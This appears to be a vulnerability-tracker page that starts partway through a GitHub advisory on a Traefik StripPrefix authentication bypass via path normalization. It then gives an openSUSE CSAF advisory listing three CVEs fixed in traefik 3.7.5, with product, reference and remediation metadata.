Advisories\n\nThis appears related to the same vulnerability family as prior Traefik path normalization / `StripPrefixRegex` bypass advisories, but it affects `StripPrefix` and remains reproducible on patched/latest versions tested above.\n\nThis was reported as a possible incomplete fix or bypass variant rather than assuming it is a duplicate.\n\n## Reporter\n\nWonYun / kyun0\n\n\u003c/details\u003e",
  "id": "GHSA-xf64-8mw2-4gr2",
  "modified": "2026-06-11T13:26:57Z",
  "published": "2026-06-11T13:26:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-xf64-8mw2-4gr2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/traefik/traefik"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.48"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.6.19"
    },
    {
      "type": "WEB",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.7.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Traefik has a StripPrefix Route-Level Auth Bypass via Path Normalization"
}

OPENSUSE-SU-2026:11047-1

Vulnerability from csaf_opensuse - Published: 2026-06-17 00:00 - Updated: 2026-06-17 00:00

Summary

traefik-3.7.5-1.1 on GA media

Severity

Moderate

Notes

Title of the patch: traefik-3.7.5-1.1 on GA media

Description of the patch: These are all security issues fixed in the traefik-3.7.5-1.1 package on the GA media of openSUSE Tumbleweed.

Patchnames: openSUSE-Tumbleweed-2026-11047

CVE-2026-48020

Affected products

Recommended 4 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64	—	Vendor Fix

Threats

Impact moderate

CVE-2026-48491

Affected products

Recommended 4 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64	—	Vendor Fix

Threats

Impact not set

CVE-2026-53622

Affected products

Recommended 4 products

Product	Version	Remediation
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x	—	Vendor Fix
Unresolved product id: openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64	—	Vendor Fix

Threats

Impact not set

References

9 references

URL	Category
https://www.suse.com/support/security/rating/	external
https://ftp.suse.com/pub/projects/security/csaf/o…	self
https://www.suse.com/security/cve/CVE-2026-48020/	self
https://www.suse.com/security/cve/CVE-2026-48491/	self
https://www.suse.com/security/cve/CVE-2026-53622/	self
https://www.suse.com/security/cve/CVE-2026-48020	external
https://bugzilla.suse.com/1268387	external
https://www.suse.com/security/cve/CVE-2026-48491	external
https://www.suse.com/security/cve/CVE-2026-53622	external

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "traefik-3.7.5-1.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the traefik-3.7.5-1.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2026-11047",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2026_11047-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-48020 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-48020/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-48491 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-48491/"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2026-53622 page",
        "url": "https://www.suse.com/security/cve/CVE-2026-53622/"
      }
    ],
    "title": "traefik-3.7.5-1.1 on GA media",
    "tracking": {
      "current_release_date": "2026-06-17T00:00:00Z",
      "generator": {
        "date": "2026-06-17T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2026:11047-1",
      "initial_release_date": "2026-06-17T00:00:00Z",
      "revision_history": [
        {
          "date": "2026-06-17T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.7.5-1.1.aarch64",
                "product": {
                  "name": "traefik-3.7.5-1.1.aarch64",
                  "product_id": "traefik-3.7.5-1.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.7.5-1.1.ppc64le",
                "product": {
                  "name": "traefik-3.7.5-1.1.ppc64le",
                  "product_id": "traefik-3.7.5-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.7.5-1.1.s390x",
                "product": {
                  "name": "traefik-3.7.5-1.1.s390x",
                  "product_id": "traefik-3.7.5-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.7.5-1.1.x86_64",
                "product": {
                  "name": "traefik-3.7.5-1.1.x86_64",
                  "product_id": "traefik-3.7.5-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.7.5-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64"
        },
        "product_reference": "traefik-3.7.5-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.7.5-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le"
        },
        "product_reference": "traefik-3.7.5-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.7.5-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x"
        },
        "product_reference": "traefik-3.7.5-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.7.5-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64"
        },
        "product_reference": "traefik-3.7.5-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2026-48020",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-48020"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "unknown",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-48020",
          "url": "https://www.suse.com/security/cve/CVE-2026-48020"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1268387 for CVE-2026-48020",
          "url": "https://bugzilla.suse.com/1268387"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-06-17T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2026-48020"
    },
    {
      "cve": "CVE-2026-48491",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-48491"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "unknown",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-48491",
          "url": "https://www.suse.com/security/cve/CVE-2026-48491"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-06-17T00:00:00Z",
          "details": "not set"
        }
      ],
      "title": "CVE-2026-48491"
    },
    {
      "cve": "CVE-2026-53622",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2026-53622"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "unknown",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x",
          "openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2026-53622",
          "url": "https://www.suse.com/security/cve/CVE-2026-53622"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.aarch64",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.ppc64le",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.s390x",
            "openSUSE Tumbleweed:traefik-3.7.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2026-06-17T00:00:00Z",
          "details": "not set"
        }
      ],
      "title": "CVE-2026-53622"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-48020 (GCVE-0-2026-48020)

CERTFR-2026-AVI-0690

Solutions

GHSA-XF64-8MW2-4GR2

Summary

Patches

For more information

OPENSUSE-SU-2026:11047-1

Tags

Sightings

Nomenclature